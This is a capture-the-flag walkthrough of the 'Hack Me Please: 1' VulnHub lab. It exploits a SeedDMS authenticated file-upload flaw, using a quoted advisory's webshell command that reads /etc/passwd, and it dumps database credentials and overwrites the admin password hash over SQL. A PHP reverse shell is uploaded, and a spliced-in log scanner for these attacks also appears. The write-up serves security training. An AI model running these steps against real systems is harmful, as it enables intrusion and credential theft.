VulnHub Walkthrough Notes (Hack Me Please: 1)
- English name: Hack Me Please: 1
- Chinese name: 請黑我:1
- Release date: 31 July 2021
- Difficulty: Easy
- Description: An easy box made entirely for OSCP. No brute force required. Goal: get a root shell.
- Download: http://www.vulnhub.com/entry/hack-me-please-1,731/
1. Boot the VM (Ubuntu_CTF)
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b5052cc01ee1d2f930b107736ab4108e02f6d6ea9fc4b7e4675f78614749aa26e.jpg)
2. Host discovery (192.168.199.109)
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b068ffeaa8078fad8857800e56fae74e65059a1089ed2a511f87f2c41084786bc.jpg)
3. Port scan (80, 3306)
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229be67c430408ea67092e9adb6308926551a289463c9de047b6f4da4b4aa020c70c.jpg)
4. Web home page
"Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker." -Emmanuel Goldstein
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b7f0451158766409094281aa3ebadea48826063253c0a9c7c6ab37aa8c467fd93.jpg)
5. View the page source and find a clue in a JS comment
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af98393101ea22c25263e1b3e89c6badbaa2cef3f2933d974090209ddf60c54cfd02caf.jpg)
6. Visit the page
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af9839378b7e2aebf6f986197371cfca244053ecf0014f045818c11515152e86b10557a.jpg)
7. Search for vulnerabilities
```
searchsploit SeedDMS
```
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af98393952f8578c1e8f0fa8cbf3560aad851a633c0bdd53420c71d5cd2232ab18a4cea.jpg)
8. Read the vulnerability description
The file upload vulnerability can only be exploited after logging in.
```
└─# find / -name "47022.txt" 2>/dev/null
/usr/share/exploitdb/exploits/php/webapps/47022.txt

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
```
9. The MySQL username and password are found in conf/settings.xml
```
dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms"
```
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4bd649f08cad11208d8bef14b4a32cb98699f7222cdcbf06e05c304619160f49ce.jpg)
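Both requests this walkthrough relies on, a served conf/settings.xml and a script fetched from the data/1048576/<document_id>/ upload store, leave entries in the web server access log. The following Python scan of Apache combined-format logs is an added example, not part of the original write-up; the /seeddms/ path prefix, client addresses and log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit

# Apache "combined" log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Upload store layout quoted in the advisory: data/1048576/<document_id>/<file>
UPLOAD_SCRIPT_RE = re.compile(
    r'/data/1048576/(?P<doc>\d+)/[^/]+\.(?:php\d?|phtml|phar)$', re.I)
SETTINGS_RE = re.compile(r'/conf/settings\.xml$', re.I)

# Constructed sample log lines (the /seeddms/ prefix is a placeholder).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2021:10:00:01 +0000] "GET /seeddms/conf/settings.xml HTTP/1.1" 200 12345 "-" "curl/7.74.0"',
    '192.0.2.10 - - [01/Aug/2021:10:05:12 +0000] "GET /seeddms/data/1048576/4/1.php?cmd=cat+/etc/passwd HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [01/Aug/2021:10:06:00 +0000] "GET /seeddms/data/1048576/9/1.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [01/Aug/2021:10:07:00 +0000] "GET /seeddms/index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Return (rule, client, path, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        path = urlsplit(m["target"]).path  # drop the query string
        status = int(m["status"])
        if SETTINGS_RE.search(path) and status == 200:
            # The config file was actually served, so the DB credentials leaked.
            findings.append(("settings-xml-served", m["client"], path, status))
        elif UPLOAD_SCRIPT_RE.search(path):
            # A script inside the document store was requested; a 200 means
            # the web server answered for it instead of refusing.
            rule = "upload-script-executed" if status == 200 else "upload-script-probe"
            findings.append((rule, m["client"], path, status))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit on either rule with status 200 is worth treating as an incident: the first means the database credentials should be rotated, the second means the upload directory is serving executable content.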
10. Log in to MySQL and look up the web username and password; logging in with them does not succeed
```
use seeddms;
show tables;
select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+
```
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229bee0f77aaac903ed6e177660f0b32d76c260d43a84f6f925783603b9028a166aa.jpg)
10. Continue with the tblUsers table and find the admin pwd
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b7feef0bb133bf2e446817a47762d847ba1c454ab0eca53524e698a854f91fb87.jpg)
11. Crack the MD5 online, fast as lightning (the "undefined" is presumably a failed decryption, awkward); logging in still fails
undefined
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983933e807914da923ee1a24aaf142ad4978ee965ad92c221bf15c97e5dff127d1651.jpg)
12. Overwrite the MD5 value
```
└─# echo -n 'ailx10'|md5sum|cut -d ' ' -f1
83b70504e0d8742dd5b66e6962eb8a35
```
```
update tblUsers set pwd="83b70504e0d8742dd5b66e6962eb8a35" where login="admin";
select login,pwd from tblUsers;
```
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b57af1a74ea50a5b47772ef9e1918cb55ddee5556c33ca7c2a097621cabe4ba3e.jpg)
13. Log in again
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b9164f822549cc7eefb02e5c19c5d95e8a49c721f4864053104e21497e502daf2.jpg)
14. Upload a reverse shell
Use the PHP reverse shell script that ships with Kali.
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4bc2b9b0bb75181425bf783184bf8ea3b86920627f75038647eeb5f2989446763f.jpg)
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983937468676354b85f1db8d49561a85d3a6517250247adb6c325d059773db0c0f6ef.jpg)
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229ba3fc9e3cae66790e9890bbdb7906ef641f1d540c65a230ac18cbc5775c682efd.jpg)
15. Listen locally, then click the reverse shell on the web page
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b158ed639c8180e04fc9fe678a88333e7af151431ee8a32b2a475fe78614bbd44.jpg)
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b3a7eb27da51ae562c108245779a4fe46a71df8c5434010ea7c3a642c54d0b253.jpg)
16. Switch user with the username and password from the users table, then use sudo to get root privileges
```
select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+
```
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4ba6f0a8a9c787a52e73af2d758270a59a0acc6671566b4645df33fbd3cec6870c.jpg)
That completes the exercise~
References
- MD5 cracking: http://pmd5.com/